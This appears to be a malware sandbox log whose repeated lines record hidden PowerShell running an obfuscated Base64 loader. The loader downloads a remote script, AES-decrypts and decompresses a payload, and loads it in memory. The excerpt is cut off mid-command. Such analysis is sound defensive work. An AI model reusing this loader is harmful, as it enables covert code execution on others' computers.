"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzX